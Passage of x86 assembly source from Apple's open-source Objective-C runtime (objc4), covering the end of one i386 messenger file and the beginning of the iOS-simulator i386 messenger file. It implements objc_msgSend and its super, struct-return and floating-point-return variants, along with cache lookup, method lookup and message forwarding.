MethodTableLookup WORD_RETURN, MSG_SEND
xor %edx, %edx // set nonstret for msgForward_internal
jmp *%eax // goto *imp
// message sent to nil: redirect to nil receiver, if any
LMsgSendNilSelf:
// %eax is already zero
movl $0,%edx
xorps %xmm0, %xmm0
LMsgSendDone:
MESSENGER_END_NIL
ret
// guaranteed non-nil entry point (disabled for now)
// .globl _objc_msgSendNonNil
// _objc_msgSendNonNil:
// movl self(%esp), %eax
// jmp LMsgSendReceiverOk
LMsgSendExit:
END_ENTRY _objc_msgSend
/********************************************************************
*
* id objc_msgSendSuper(struct objc_super *super, SEL _cmd,...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
********************************************************************/
ENTRY _objc_msgSendSuper
MESSENGER_START
CALL_MCOUNTER
// load selector and class to search
movl super(%esp), %eax // struct objc_super
movl selector(%esp), %ecx
movl class(%eax), %edx // struct objc_super->class
// check whether selector is ignored
cmpl $ kIgnore, %ecx
je LMsgSendSuperIgnored // return self from %eax
// search the cache (class in %edx)
CacheLookup WORD_RETURN, MSG_SENDSUPER, LMsgSendSuperCacheMiss
xor %edx, %edx // set nonstret for msgForward_internal
MESSENGER_END_FAST
jmp *%eax // goto *imp
// cache miss: go search the method lists
LMsgSendSuperCacheMiss:
MethodTableLookup WORD_RETURN, MSG_SENDSUPER
xor %edx, %edx // set nonstret for msgForward_internal
jmp *%eax // goto *imp
// ignored selector: return self
LMsgSendSuperIgnored:
movl super(%esp), %eax
movl receiver(%eax), %eax
MESSENGER_END_NIL
ret
LMsgSendSuperExit:
END_ENTRY _objc_msgSendSuper
/********************************************************************
* id objc_msgSendv(id self, SEL _cmd, unsigned size, marg_list frame);
*
* On entry:
* (sp+4) is the message receiver,
* (sp+8) is the selector,
* (sp+12) is the size of the marg_list, in bytes,
* (sp+16) is the address of the marg_list
*
********************************************************************/
ENTRY _objc_msgSendv
#if defined(KERNEL)
trap // _objc_msgSendv is not for the kernel
#else
pushl %ebp
movl %esp, %ebp
// stack is currently aligned assuming no extra arguments
movl (marg_list+4)(%ebp), %edx
addl $8, %edx // skip self & selector
movl (marg_size+4)(%ebp), %ecx
subl $8, %ecx // skip self & selector
shrl $2, %ecx
je LMsgSendvArgsOK
// %esp = %esp - (16 - ((numVariableArguments & 3) << 2))
movl %ecx, %eax // 16-byte align stack
andl $3, %eax
shll $2, %eax
subl $16, %esp
addl %eax, %esp
LMsgSendvArgLoop:
decl %ecx
movl 0(%edx, %ecx, 4), %eax
pushl %eax
jg LMsgSendvArgLoop
LMsgSendvArgsOK:
movl (selector+4)(%ebp), %ecx
pushl %ecx
movl (self+4)(%ebp),%ecx
pushl %ecx
call _objc_msgSend
movl %ebp,%esp
popl %ebp
ret
#endif
END_ENTRY _objc_msgSendv
/********************************************************************
*
* double objc_msgSend_fpret(id self, SEL _cmd,...);
*
********************************************************************/
ENTRY _objc_msgSend_fpret
MESSENGER_START
CALL_MCOUNTER
// load receiver and selector
movl selector(%esp), %ecx
movl self(%esp), %eax
// check whether selector is ignored
cmpl $ kIgnore, %ecx
je LMsgSendFpretDone // return self from %eax
// check whether receiver is nil
testl %eax, %eax
je LMsgSendFpretNilSelf
// receiver (in %eax) is non-nil: search the cache
LMsgSendFpretReceiverOk:
movl isa(%eax), %edx // class = self->isa
CacheLookup WORD_RETURN, MSG_SEND, LMsgSendFpretCacheMiss
xor %edx, %edx // set nonstret for msgForward_internal
MESSENGER_END_FAST
jmp *%eax // goto *imp
// cache miss: go search the method lists
LMsgSendFpretCacheMiss:
MethodTableLookup WORD_RETURN, MSG_SEND
xor %edx, %edx // set nonstret for msgForward_internal
jmp *%eax // goto *imp
// message sent to nil: redirect to nil receiver, if any
LMsgSendFpretNilSelf:
// %eax is already zero
fldz
LMsgSendFpretDone:
MESSENGER_END_NIL
ret
LMsgSendFpretExit:
END_ENTRY _objc_msgSend_fpret
/********************************************************************
* double objc_msgSendv_fpret(id self, SEL _cmd, unsigned size, marg_list frame);
*
* On entry:
* (sp+4) is the message receiver,
* (sp+8) is the selector,
* (sp+12) is the size of the marg_list, in bytes,
* (sp+16) is the address of the marg_list
*
********************************************************************/
ENTRY _objc_msgSendv_fpret
#if defined(KERNEL)
trap // _objc_msgSendv is not for the kernel
#else
pushl %ebp
movl %esp, %ebp
// stack is currently aligned assuming no extra arguments
movl (marg_list+4)(%ebp), %edx
addl $8, %edx // skip self & selector
movl (marg_size+4)(%ebp), %ecx
subl $8, %ecx // skip self & selector
shrl $2, %ecx
je LMsgSendvFpretArgsOK
// %esp = %esp - (16 - ((numVariableArguments & 3) << 2))
movl %ecx, %eax // 16-byte align stack
andl $3, %eax
shll $2, %eax
subl $16, %esp
addl %eax, %esp
LMsgSendvFpretArgLoop:
decl %ecx
movl 0(%edx, %ecx, 4), %eax
pushl %eax
jg LMsgSendvFpretArgLoop
LMsgSendvFpretArgsOK:
movl (selector+4)(%ebp), %ecx
pushl %ecx
movl (self+4)(%ebp),%ecx
pushl %ecx
call _objc_msgSend_fpret
movl %ebp,%esp
popl %ebp
ret
#endif
END_ENTRY _objc_msgSendv_fpret
/********************************************************************
*
* void objc_msgSend_stret(void *st_addr , id self, SEL _cmd, ...);
*
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for (sp+4) to be used as the address of the structure
* being returned, with the parameters in the succeeding locations.
*
* On entry: (sp+4)is the address where the structure is returned,
* (sp+8) is the message receiver,
* (sp+12) is the selector
********************************************************************/
ENTRY _objc_msgSend_stret
MESSENGER_START
CALL_MCOUNTER
// load receiver and selector
movl self_stret(%esp), %eax
movl (selector_stret)(%esp), %ecx
// check whether receiver is nil
testl %eax, %eax
je LMsgSendStretNilSelf
// receiver (in %eax) is non-nil: search the cache
LMsgSendStretReceiverOk:
movl isa(%eax), %edx // class = self->isa
CacheLookup STRUCT_RETURN, MSG_SEND, LMsgSendStretCacheMiss
movl $1, %edx // set stret for objc_msgForward
MESSENGER_END_FAST
jmp *%eax // goto *imp
// cache miss: go search the method lists
LMsgSendStretCacheMiss:
MethodTableLookup STRUCT_RETURN, MSG_SEND
movl $1, %edx // set stret for objc_msgForward
jmp *%eax // goto *imp
// message sent to nil: redirect to nil receiver, if any
LMsgSendStretNilSelf:
MESSENGER_END_NIL
ret $4 // pop struct return address (#2995932)
// guaranteed non-nil entry point (disabled for now)
// .globl _objc_msgSendNonNil_stret
// _objc_msgSendNonNil_stret:
// CALL_MCOUNTER
// movl self_stret(%esp), %eax
// jmp LMsgSendStretReceiverOk
LMsgSendStretExit:
END_ENTRY _objc_msgSend_stret
/********************************************************************
*
* void objc_msgSendSuper_stret(void *st_addr, struct objc_super *super, SEL _cmd, ...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
*
* objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
* The ABI calls for (sp+4) to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: (sp+4)is the address where the structure is returned,
* (sp+8) is the address of the objc_super structure,
* (sp+12) is the selector
*
********************************************************************/
ENTRY _objc_msgSendSuper_stret
MESSENGER_START
CALL_MCOUNTER
// load selector and class to search
movl super_stret(%esp), %eax // struct objc_super
movl (selector_stret)(%esp), %ecx // get selector
movl class(%eax), %edx // struct objc_super->class
// search the cache (class in %edx)
CacheLookup STRUCT_RETURN, MSG_SENDSUPER, LMsgSendSuperStretCacheMiss
movl $1, %edx // set stret for objc_msgForward
MESSENGER_END_FAST
jmp *%eax // goto *imp
// cache miss: go search the method lists
LMsgSendSuperStretCacheMiss:
MethodTableLookup STRUCT_RETURN, MSG_SENDSUPER
movl $1, %edx // set stret for objc_msgForward
jmp *%eax // goto *imp
LMsgSendSuperStretExit:
END_ENTRY _objc_msgSendSuper_stret
/********************************************************************
* void objc_msgSendv_stret(void *st_addr, id self, SEL _cmd, unsigned size, marg_list frame);
*
* objc_msgSendv_stret is the struct-return form of msgSendv.
* This function does not use the struct-return ABI; instead, the
* structure return address is passed as a normal parameter.
*
* On entry: (sp+4) is the address in which the returned struct is put,
* (sp+8) is the message receiver,
* (sp+12) is the selector,
* (sp+16) is the size of the marg_list, in bytes,
* (sp+20) is the address of the marg_list
*
********************************************************************/
ENTRY _objc_msgSendv_stret
#if defined(KERNEL)
trap // _objc_msgSendv_stret is not for the kernel
#else
pushl %ebp
movl %esp, %ebp
subl $12, %esp // align stack assuming no extra arguments
movl (marg_list_stret+4)(%ebp), %edx
addl $8, %edx // skip self & selector
movl (marg_size_stret+4)(%ebp), %ecx
subl $5, %ecx // skip self & selector
shrl $2, %ecx
jle LMsgSendvStretArgsOK
// %esp = %esp - (16 - ((numVariableArguments & 3) << 2))
movl %ecx, %eax // 16-byte align stack
andl $3, %eax
shll $2, %eax
subl $16, %esp
addl %eax, %esp
LMsgSendvStretArgLoop:
decl %ecx
movl 0(%edx, %ecx, 4), %eax
pushl %eax
jg LMsgSendvStretArgLoop
LMsgSendvStretArgsOK:
movl (selector_stret+4)(%ebp), %ecx
pushl %ecx
movl (self_stret+4)(%ebp),%ecx
pushl %ecx
movl (struct_addr+4)(%ebp),%ecx
pushl %ecx
call _objc_msgSend_stret
movl %ebp,%esp
popl %ebp
ret
#endif
END_ENTRY _objc_msgSendv_stret
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
********************************************************************/
// _FwdSel is @selector(forward::), set up in map_images().
// ALWAYS dereference _FwdSel to get to "forward::" !!
.data
.align 2
.private_extern _FwdSel
_FwdSel: .long 0
.cstring
.align 2
LUnkSelStr: .ascii "Does not recognize selector %s (while forwarding %s)\0"
.non_lazy_symbol_pointer
L_forward_handler:
.indirect_symbol __objc_forward_handler
.long 0
L_forward_stret_handler:
.indirect_symbol __objc_forward_stret_handler
.long 0
STATIC_ENTRY __objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band register %edx is nonzero for stret, zero otherwise
MESSENGER_START
nop
MESSENGER_END_SLOW
// Check return type (stret or not)
testl %edx, %edx
jnz __objc_msgForward_stret
jmp __objc_msgForward
END_ENTRY _objc_msgForward_impcache
ENTRY __objc_msgForward
// Non-struct return version
// Get PIC base into %edx
call L__objc_msgForward$pic_base
L__objc_msgForward$pic_base:
popl %edx
// Call user handler, if any
movl L_forward_handler-L__objc_msgForward$pic_base(%edx),%ecx
movl (%ecx), %ecx
testl %ecx, %ecx // if not NULL
je 1f // skip to default handler
jmp *%ecx // call __objc_forward_handler
1:
// No user handler
// Push stack frame
pushl %ebp
movl %esp, %ebp
// Die if forwarding "forward::"
movl (selector+4)(%ebp), %eax
movl _FwdSel-L__objc_msgForward$pic_base(%edx),%ecx
cmpl %ecx, %eax
je LMsgForwardError
// Call [receiver forward:sel :margs]
subl $8, %esp // 16-byte align the stack
leal (self+4)(%ebp), %ecx
pushl %ecx // &margs
pushl %eax // sel
movl _FwdSel-L__objc_msgForward$pic_base(%edx),%ecx
pushl %ecx // forward::
pushl (self+4)(%ebp) // receiver
call _objc_msgSend
movl %ebp, %esp
popl %ebp
ret
LMsgForwardError:
// Call __objc_error(receiver, "unknown selector %s %s", "forward::", forwardedSel)
subl $8, %esp // 16-byte align the stack
pushl (selector+4+4)(%ebp) // the forwarded selector
movl _FwdSel-L__objc_msgForward$pic_base(%edx),%eax
pushl %eax
leal LUnkSelStr-L__objc_msgForward$pic_base(%edx),%eax
pushl %eax
pushl (self+4)(%ebp)
call ___objc_error // never returns
END_ENTRY __objc_msgForward
ENTRY __objc_msgForward_stret
// Struct return version
// Get PIC base into %edx
call L__objc_msgForwardStret$pic_base
L__objc_msgForwardStret$pic_base:
popl %edx
// Call user handler, if any
movl L_forward_stret_handler-L__objc_msgForwardStret$pic_base(%edx), %ecx
movl (%ecx), %ecx
testl %ecx, %ecx // if not NULL
je 1f // skip to default handler
jmp *%ecx // call __objc_forward_stret_handler
1:
// No user handler
// Push stack frame
pushl %ebp
movl %esp, %ebp
// Die if forwarding "forward::"
movl (selector_stret+4)(%ebp), %eax
movl _FwdSel-L__objc_msgForwardStret$pic_base(%edx), %ecx
cmpl %ecx, %eax
je LMsgForwardStretError
// Call [receiver forward:sel :margs]
subl $8, %esp // 16-byte align the stack
leal (self_stret+4)(%ebp), %ecx
pushl %ecx // &margs
pushl %eax // sel
movl _FwdSel-L__objc_msgForwardStret$pic_base(%edx),%ecx
pushl %ecx // forward::
pushl (self_stret+4)(%ebp) // receiver
call _objc_msgSend
movl %ebp, %esp
popl %ebp
ret $4 // pop struct return address (#2995932)
LMsgForwardStretError:
// Call __objc_error(receiver, "unknown selector %s %s", "forward::", forwardedSelector)
subl $8, %esp // 16-byte align the stack
pushl (selector_stret+4+4)(%ebp) // the forwarded selector
leal _FwdSel-L__objc_msgForwardStret$pic_base(%edx),%eax
pushl %eax
leal LUnkSelStr-L__objc_msgForwardStret$pic_base(%edx),%eax
pushl %eax
pushl (self_stret+4)(%ebp)
call ___objc_error // never returns
END_ENTRY __objc_msgForward_stret
ENTRY _method_invoke
movl selector(%esp), %ecx
movl method_name(%ecx), %edx
movl method_imp(%ecx), %eax
movl %edx, selector(%esp)
jmp *%eax
END_ENTRY _method_invoke
ENTRY _method_invoke_stret
movl selector_stret(%esp), %ecx
movl method_name(%ecx), %edx
movl method_imp(%ecx), %eax
movl %edx, selector_stret(%esp)
jmp *%eax
END_ENTRY _method_invoke_stret
STATIC_ENTRY __objc_ignored_method
movl self(%esp), %eax
ret
END_ENTRY __objc_ignored_method
.section __DATA,__objc_msg_break
.long 0
.long 0
#endif
|
opensource-apple/objc4 | 20,309 | runtime/Messengers.subproj/objc-msg-simulator-i386.s | /*
* Copyright (c) 1999-2009 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#include <TargetConditionals.h>
#if defined(__i386__) && TARGET_IPHONE_SIMULATOR
#include "objc-config.h"
.data
// _objc_entryPoints and _objc_exitPoints are used by objc
// to get the critical regions for which method caches
// cannot be garbage collected.
.align 2
.private_extern _objc_entryPoints
_objc_entryPoints:
.long _cache_getImp
.long _objc_msgSend
.long _objc_msgSend_fpret
.long _objc_msgSend_stret
.long _objc_msgSendSuper
.long _objc_msgSendSuper2
.long _objc_msgSendSuper_stret
.long _objc_msgSendSuper2_stret
.long 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.long LGetImpExit
.long LMsgSendExit
.long LMsgSendFpretExit
.long LMsgSendStretExit
.long LMsgSendSuperExit
.long LMsgSendSuper2Exit
.long LMsgSendSuperStretExit
.long LMsgSendSuper2StretExit
.long 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.long 4b
.long ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.long 4b
.long FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.long 4b
.long SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.long 4b
.long NIL_EXIT
.text
.endmacro
/********************************************************************
* Names for relative labels
* DO NOT USE THESE LABELS ELSEWHERE
* Reserved labels: 5: 6: 7: 8: 9:
********************************************************************/
#define LCacheMiss 5
#define LCacheMiss_f 5f
#define LCacheMiss_b 5b
#define LNilTestDone 6
#define LNilTestDone_f 6f
#define LNilTestDone_b 6b
#define LNilTestSlow 7
#define LNilTestSlow_f 7f
#define LNilTestSlow_b 7b
#define LGetIsaDone 8
#define LGetIsaDone_f 8f
#define LGetIsaDone_b 8b
#define LGetIsaSlow 9
#define LGetIsaSlow_f 9f
#define LGetIsaSlow_b 9b
/********************************************************************
* Macro parameters
********************************************************************/
#define NORMAL 0
#define FPRET 1
#define GETIMP 3
#define STRET 4
#define SUPER 5
#define SUPER_STRET 6
/********************************************************************
*
* Structure definitions.
*
********************************************************************/
// Offsets from %esp
#define self 4
#define super 4
#define selector 8
#define marg_size 12
#define marg_list 16
#define first_arg 12
#define struct_addr 4
#define self_stret 8
#define super_stret 8
#define selector_stret 12
#define marg_size_stret 16
#define marg_list_stret 20
// objc_super parameter to sendSuper
#define receiver 0
#define class 4
// Selected field offsets in class structure
#define isa 0
#define superclass 4
// Method descriptor
#define method_name 0
#define method_imp 8
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro ENTRY
.text
.globl $0
.align 2, 0x90
$0:
.cfi_startproc
.endmacro
.macro STATIC_ENTRY
.text
.private_extern $0
.align 4, 0x90
$0:
.cfi_startproc
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro END_ENTRY
.cfi_endproc
.endmacro
/////////////////////////////////////////////////////////////////////
//
// CacheLookup return-type
//
// Locate the implementation for a selector in a class method cache.
//
// Takes:
// $0 = NORMAL, FPRET, STRET, SUPER, SUPER_STRET, GETIMP
// ecx = selector to search for
// edx = class to search
//
// On exit: ecx clobbered
// (found) calls or returns IMP in eax, eq/ne set for forwarding
// (not found) jumps to LCacheMiss, class still in edx
//
/////////////////////////////////////////////////////////////////////
.macro CacheHit
// CacheHit must always be preceded by a not-taken `jne` instruction
// in case the imp is _objc_msgForward_impcache.
.if $0 == GETIMP
movl 4(%eax), %eax // return imp
call 4f
4: pop %edx
leal __objc_msgSend_uncached_impcache-4b(%edx), %edx
cmpl %edx, %eax
jne 4f
xor %eax, %eax // don't return msgSend_uncached
4: ret
.elseif $0 == NORMAL || $0 == FPRET
// eq already set for forwarding by `jne`
MESSENGER_END_FAST
jmp *4(%eax) // call imp
.elseif $0 == STRET
test %eax, %eax // set ne for stret forwarding
MESSENGER_END_FAST
jmp *4(%eax) // call imp
.elseif $0 == SUPER
// replace "super" arg with "receiver"
movl super(%esp), %ecx // get super structure
movl receiver(%ecx), %ecx // get messaged object
movl %ecx, super(%esp) // make it the first argument
cmp %eax, %eax // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *4(%eax) // call imp
.elseif $0 == SUPER_STRET
// replace "super" arg with "receiver"
movl super_stret(%esp), %ecx // get super structure
movl receiver(%ecx), %ecx // get messaged object
movl %ecx, super_stret(%esp) // make it the first argument
test %eax, %eax // set ne for stret forwarding
MESSENGER_END_FAST
jmp *4(%eax) // call imp
.else
.abort oops
.endif
.endmacro
.macro CacheLookup
movzwl 12(%edx), %eax // eax = mask
andl %ecx, %eax // eax = SEL & mask
shll $$3, %eax // eax = offset = (SEL & mask) * 8
addl 8(%edx), %eax // eax = bucket = cache->buckets+offset
cmpl (%eax), %ecx // if (bucket->sel != SEL)
jne 1f // scan more
// The `jne` above sets flags for CacheHit
CacheHit $0 // call or return imp
1:
// loop
cmpl $$1, (%eax)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addl $$8, %eax // bucket++
2:
cmpl (%eax), %ecx // if (bucket->sel != sel)
jne 1b // scan more
// The `jne` above sets flags for CacheHit
CacheHit $0 // call or return imp
3:
// wrap or miss
jb LCacheMiss_f // if (bucket->sel < 1) cache miss
// wrap
movl 4(%eax), %eax // bucket->imp is really first bucket
jmp 2f
// Clone scanning loop to miss instead of hang when cache is corrupt.
// The slow path may detect any corruption and halt later.
1:
// loop
cmpq $$1, (%eax)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addl $$8, %eax // bucket++
2:
cmpl (%eax), %ecx // if (bucket->sel != sel)
jne 1b // scan more
// The `jne` above sets flags for CacheHit
CacheHit $0 // call or return imp
3:
// double wrap or miss
jmp LCacheMiss_f
.endmacro
/////////////////////////////////////////////////////////////////////
//
// MethodTableLookup
//
// Takes:
// $0 = NORMAL, FPRET, STRET, SUPER, SUPER_STRET
// eax = receiver
// ecx = selector
// edx = class to search
//
// On exit: calls IMP, eq/ne set for forwarding
//
/////////////////////////////////////////////////////////////////////
.macro MethodTableLookup
MESSENGER_END_SLOW
pushl %ebp
.cfi_def_cfa_offset 8
.cfi_offset ebp, -8
movl %esp, %ebp
.cfi_def_cfa_register ebp
subl $$(8+5*16), %esp
movdqa %xmm3, 4*16(%esp)
movdqa %xmm2, 3*16(%esp)
movdqa %xmm1, 2*16(%esp)
movdqa %xmm0, 1*16(%esp)
movl %edx, 8(%esp) // class
movl %ecx, 4(%esp) // selector
movl %eax, 0(%esp) // receiver
call __class_lookupMethodAndLoadCache3
// imp in eax
movdqa 4*16(%esp), %xmm3
movdqa 3*16(%esp), %xmm2
movdqa 2*16(%esp), %xmm1
movdqa 1*16(%esp), %xmm0
leave
.cfi_def_cfa esp, 4
.cfi_same_value ebp
.if $0 == SUPER
// replace "super" arg with "receiver"
movl super(%esp), %ecx // get super structure
movl receiver(%ecx), %ecx // get messaged object
movl %ecx, super(%esp) // make it the first argument
.elseif $0 == SUPER_STRET
// replace "super" arg with "receiver"
movl super_stret(%esp), %ecx // get super structure
movl receiver(%ecx), %ecx // get messaged object
movl %ecx, super_stret(%esp) // make it the first argument
.endif
.if $0 == STRET || $0 == SUPER_STRET
// set ne (stret) for forwarding; eax != 0
test %eax, %eax
jmp *%eax // call imp
.else
// set eq (non-stret) for forwarding
cmp %eax, %eax
jmp *%eax // call imp
.endif
.endmacro
/////////////////////////////////////////////////////////////////////
//
// NilTest return-type
//
// Takes: $0 = NORMAL or FPRET or STRET
// eax = receiver
//
// On exit: Loads non-nil receiver in eax and self(esp) or self_stret(esp),
// or returns zero.
//
// NilTestSupport return-type
//
// Takes: $0 = NORMAL or FPRET or STRET
// eax = receiver
//
// On exit: Loads non-nil receiver in eax and self(esp) or self_stret(esp),
// or returns zero.
//
/////////////////////////////////////////////////////////////////////
.macro NilTest
testl %eax, %eax
jz LNilTestSlow_f
LNilTestDone:
.endmacro
.macro NilTestSupport
.align 3
LNilTestSlow:
.if $0 == FPRET
fldz
MESSENGER_END_NIL
ret
.elseif $0 == STRET
MESSENGER_END_NIL
ret $$4
.elseif $0 == NORMAL
// eax is already zero
xorl %edx, %edx
xorps %xmm0, %xmm0
xorps %xmm1, %xmm1
MESSENGER_END_NIL
ret
.endif
.endmacro
/********************************************************************
* IMP _cache_getImp(Class cls, SEL sel)
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
STATIC_ENTRY _cache_getImp
// load the class and selector
movl selector(%esp), %ecx
movl self(%esp), %edx
CacheLookup GETIMP // returns IMP on success
LCacheMiss:
// cache miss, return nil
xorl %eax, %eax
ret
LGetImpExit:
END_ENTRY _cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
ENTRY _objc_msgSend
MESSENGER_START
movl selector(%esp), %ecx
movl self(%esp), %eax
NilTest NORMAL
movl isa(%eax), %edx // class = self->isa
CacheLookup NORMAL // calls IMP on success
NilTestSupport NORMAL
LCacheMiss:
// isa still in edx
movl selector(%esp), %ecx
movl self(%esp), %eax
MethodTableLookup NORMAL // calls IMP
LMsgSendExit:
END_ENTRY _objc_msgSend
/********************************************************************
*
* id objc_msgSendSuper(struct objc_super *super, SEL _cmd,...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
********************************************************************/
ENTRY _objc_msgSendSuper
MESSENGER_START
movl selector(%esp), %ecx
movl super(%esp), %eax // struct objc_super
movl class(%eax), %edx // struct objc_super->class
CacheLookup SUPER // calls IMP on success
LCacheMiss:
// class still in edx
movl selector(%esp), %ecx
movl super(%esp), %eax
movl receiver(%eax), %eax
MethodTableLookup SUPER // calls IMP
LMsgSendSuperExit:
END_ENTRY _objc_msgSendSuper
ENTRY _objc_msgSendSuper2
MESSENGER_START
movl selector(%esp), %ecx
movl super(%esp), %eax // struct objc_super
movl class(%eax), %eax // struct objc_super->class
mov superclass(%eax), %edx // edx = objc_super->class->super_class
CacheLookup SUPER // calls IMP on success
LCacheMiss:
// class still in edx
movl selector(%esp), %ecx
movl super(%esp), %eax
movl receiver(%eax), %eax
MethodTableLookup SUPER // calls IMP
LMsgSendSuper2Exit:
END_ENTRY _objc_msgSendSuper2
/********************************************************************
*
* double objc_msgSend_fpret(id self, SEL _cmd,...);
*
********************************************************************/
ENTRY _objc_msgSend_fpret
MESSENGER_START
movl selector(%esp), %ecx
movl self(%esp), %eax
NilTest FPRET
movl isa(%eax), %edx // class = self->isa
CacheLookup FPRET // calls IMP on success
NilTestSupport FPRET
LCacheMiss:
// class still in edx
movl selector(%esp), %ecx
movl self(%esp), %eax
MethodTableLookup FPRET // calls IMP
LMsgSendFpretExit:
END_ENTRY _objc_msgSend_fpret
/********************************************************************
*
* void objc_msgSend_stret(void *st_addr , id self, SEL _cmd, ...);
*
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for (sp+4) to be used as the address of the structure
* being returned, with the parameters in the succeeding locations.
*
* On entry: (sp+4)is the address where the structure is returned,
* (sp+8) is the message receiver,
* (sp+12) is the selector
********************************************************************/
ENTRY _objc_msgSend_stret
MESSENGER_START
movl selector_stret(%esp), %ecx
movl self_stret(%esp), %eax
NilTest STRET
movl isa(%eax), %edx // class = self->isa
CacheLookup STRET // calls IMP on success
NilTestSupport STRET
LCacheMiss:
// class still in edx
movl selector_stret(%esp), %ecx
movl self_stret(%esp), %eax
MethodTableLookup STRET // calls IMP
LMsgSendStretExit:
END_ENTRY _objc_msgSend_stret
/********************************************************************
*
* void objc_msgSendSuper_stret(void *st_addr, struct objc_super *super, SEL _cmd, ...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
*
* objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
* The ABI calls for (sp+4) to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: (sp+4)is the address where the structure is returned,
* (sp+8) is the address of the objc_super structure,
* (sp+12) is the selector
*
********************************************************************/
ENTRY _objc_msgSendSuper_stret
MESSENGER_START
movl selector_stret(%esp), %ecx
movl super_stret(%esp), %eax // struct objc_super
movl class(%eax), %edx // struct objc_super->class
CacheLookup SUPER_STRET // calls IMP on success
LCacheMiss:
// class still in edx
movl selector_stret(%esp), %ecx
movl super_stret(%esp), %eax
movl receiver(%eax), %eax
MethodTableLookup SUPER_STRET // calls IMP
LMsgSendSuperStretExit:
END_ENTRY _objc_msgSendSuper_stret
ENTRY _objc_msgSendSuper2_stret
MESSENGER_START
movl selector_stret(%esp), %ecx
movl super_stret(%esp), %eax // struct objc_super
movl class(%eax), %eax // struct objc_super->class
mov superclass(%eax), %edx // edx = objc_super->class->super_class
CacheLookup SUPER_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in edx
movl selector_stret(%esp), %ecx
movl super_stret(%esp), %eax
movl receiver(%eax), %eax
MethodTableLookup SUPER_STRET // calls IMP
LMsgSendSuper2StretExit:
END_ENTRY _objc_msgSendSuper2_stret
/********************************************************************
*
* _objc_msgSend_uncached_impcache
* _objc_msgSend_uncached
* _objc_msgSend_stret_uncached
*
* Used to erase method cache entries in-place by
* bouncing them to the uncached lookup.
*
********************************************************************/
STATIC_ENTRY __objc_msgSend_uncached_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
// Out-of-band edx is the searched class
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgSend_stret_uncached
jmp __objc_msgSend_uncached
END_ENTRY __objc_msgSend_uncached_impcache
STATIC_ENTRY __objc_msgSend_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band edx is the searched class
// edx is already the class to search
movl selector(%esp), %ecx
MethodTableLookup NORMAL // calls IMP
END_ENTRY __objc_msgSend_uncached
STATIC_ENTRY __objc_msgSend_stret_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band edx is the searched class
// edx is already the class to search
movl selector_stret(%esp), %ecx
MethodTableLookup STRET // calls IMP
END_ENTRY __objc_msgSend_stret_uncached
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward and _objc_msgForward_stret are the externally-callable
* functions returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
.non_lazy_symbol_pointer
L_forward_handler:
.indirect_symbol __objc_forward_handler
.long 0
L_forward_stret_handler:
.indirect_symbol __objc_forward_stret_handler
.long 0
STATIC_ENTRY __objc_msgForward_impcache
// Method cache version
